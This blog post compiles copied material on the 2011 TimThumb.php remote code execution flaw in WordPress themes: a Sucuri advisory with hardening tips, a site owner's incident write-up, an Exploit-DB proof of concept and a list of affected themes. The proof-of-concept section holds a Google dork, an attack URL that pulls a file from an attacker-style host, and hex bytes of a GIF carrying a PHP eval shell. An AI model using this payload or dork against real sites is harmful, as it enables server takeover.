Monday, August 15, 2011

Timthumb.php Security Vulnerability [Wordpress Theme]


Timthumb.php Security Vulnerability [Wordpress Theme]


This news is very famous in this week and I got some page to this post for my read. If you want to see full article or detail of the news, please go to the source.

The News 

There has been some buzz about a zero day vulnerability found in Timthumb.php that can allow for arbitrary file uploads. Although this is a platform independent issue, it is specially an issue on WordPress where a lot of theme authors choose to include scripts in themes without any extra security measures.
You can read more details about the TimThumb issue here: markmaunder.com
This is definitely an issue, but it’s just the tip of the iceberg. TimThumb is just one of various scripts that are being added to themes/plugins without further vetting, or even incorrectly. Take Uploadify for example, which we’ve recently seen being exploited in very old versions of a popular WordPress theme.

Another issue is inexperience, well, along with laziness in some cases. WordPress has built in a lot of great capabilities that aren’t being properly leveraged. For example, if theme/plugin authors were properly leveraging 
add_image_size vs. adding TimThumb they would be in a safer position today.
Unfortunately this is not an easy problem to tackle. WordPress core has a great review and vetting process, it is very controlled for good reason. The problem here is really around plugins and themes, it’s not as simple as you may think to check every release being there are thousands of free and premium options on the market today

Minimize Your Risk

Here are a few things that if put into practice, will help you minimize the risk of getting exploited:
  1. Keep your themes and plugins updated – #1 cause of malware infections and hacks independent of any platform!
  2. Only download from reputable sources (WordPress.org).
  3. Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework
  4. Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
  5. Don’t just disable, remove any software that you’re not actively using. Just because it’s not active doesn’t mean it’s not vulnerable

Sucuri WordPress Check

Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP Check

How to Use

  1. Save script to your local machine by right clicking the link above and save link as
  2. Login to your site via sFTP or FTP (We recommend sFTP/SSH)
  3. Upload the script to your root WordPress directory
  4. Rename sucuri_wp_check.txt to sucuri_wp_check.php
  5. Run the script via browser of choice – yourdomain.com/sucuri_wp_check.php – Make sure you change the URL path to your domain and wherever you uploaded the file
  6. Check the results
Source: http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html

details and scripts of the WordPress Timthumb.php hack

also run the latest version of WordPress.org.
My WordPress root directory was writable, but making it read only would not have prevented the hack.
Timthumb.php in it’s default configuration allows site visitors to load images from a predefined set of remote websites for resizing and serving. Timthumb offers a caching mechanism so that it doesn’t have to continually re-process images. The cache directory lives under the wordpress root and is accessible by visitors to the website.
The ability for a site visitor to load content from a remote website and to make the web server write that remote content to a web accessible directory is the cause of the vulnerability in timthumb.php.
To be clear, timthumb.php does not actually execute any remote malicious code that causes this vulnerability. This was a point of confusion among some commenters in my blog post yesterday. It simply gets a remote file and places it in a web accessible directory.
Timthumb only allows remote content from a small range of websites to be loaded remotelyIn it’s default configuration these included Blogger, WordPress.com and other sites that are writeable by the general public.
Timthumb’s verification that remote content was only being loaded by these domains was also broken. You could for example load content from hackersiteblogspot.com or from blogspot.com.hackersite.com.
I’ve submitted a patch that fixes the pattern matching and removed all default public hosting sites from the allowed sites list. The developer has opted to keep a small list in which I’m not in favor of.
In my case the hacker uploaded a script to my cache directory which timthumb.php stores as “external_.php”. He/she then accessed this script directly in my timthumb cache directory as something like http://markmaunder.com/wp-content/themes/Memoir/scripts/cache/external_md5hash.php
The script uploaded was Alucar shell which is base64 encoded and decodes when it executes. That makes it a little harder to find it using grep or similar tool. You can see the encoded version of Alucar here and the decoded version of Alucar here (without the username and password preamble at the top).
Here’s a screenshot of the UI:
This script which gives a web based shell access was then used to inject base64 code to one of my core wordpress files wp-blog-header.php which lives in the wordpress root directory. The file with injected code looked like this.
The decoded version of this base64 code is this. The code executes whenever a blog page is visited. It fetches a file from a URL and writes it to /tmp. Then it executes the php code that is contained in this file. In my case it simply echo’d some javascript code that would show ads. Here is the code contained in the file in /tmp.
Again, this file is periodically updated with new PHP code, so the attacker could have his way with my server until I found out about it. The code could be altered to instead become a spam system and work it’s way through a long list of spam emails.
The way I tracked this to conclusion was:
  • Heard audio on my blog telling me I’d won something.
  • Checked Chrome network tools and saw ad content loading and I don’t serve ads.
  • Grepped wordpress source and themes for hostname I saw in ad. Nothing.
  • Dumped mysql databases on server (all of them) and grepped for hostname. Nothing.
  • Confusion reigns.
  • Started working my way through nginx (which is my front end proxy to apache) and apache access and error logs.
  • Spotted lines in apache error log like this: “[Mon Aug 01 11:09:12 2011] [error] [client 127.0.0.1] PHP Warning: file_get_contents(http://blogger.com.zoha.vn/db/load.php): failed to open stream: HTTP request failed! in /usr/local/markmaunder/wp-content/themes/Memoir/timthumb.php on line 675″
  • Checked timthumb’s cache directory and found Alucar.
  • Realized base64 encoding is why I didn’t find anything with grep.
  • Regrepped wordpress source and database and found injection in wp-blog-header.php
  • Decoded base64 stuff and played with Alucar
  • Found tmp file in /tmp
  • Cleaned everything and fixed permissions. Ran chkrootkit and other utils on machine to see if anything else was compromised. Changed passwords, etc.
Source: http://http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
Proof-Of-Concept. [PoC]
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
  
  
WordPress TimThumb (Theme) Plugin - Remote Code Execution
  
  
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
 
  
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
 
  
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
  
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
  
  
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.
 
 
Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
 
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
 
 
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
 
(Transparent GIF + 
 
  
  
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
 
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
  
  
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011

Source: http://www.1337day.com/exploits/16592

List of Themes

The Timthumb 0-day security vulnerability is generating a lot of noise and for good reason. If you have a theme that includes TimThumb, your site can be easily hacked.
Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb. 

If you use any of the following themes please check to see if the script is present, and make sure it is updated: 

8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.php
aranovo/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
aurorae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/includes/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/includes/thumb.php
swift/includes/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
ugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/includes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php
Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.
Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script. 

Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.



By Kaila Piyush HackingArticles4all.blogspot.com

No comments:

Post a Comment

You might also like....

Related Posts Plugin for WordPress, Blogger...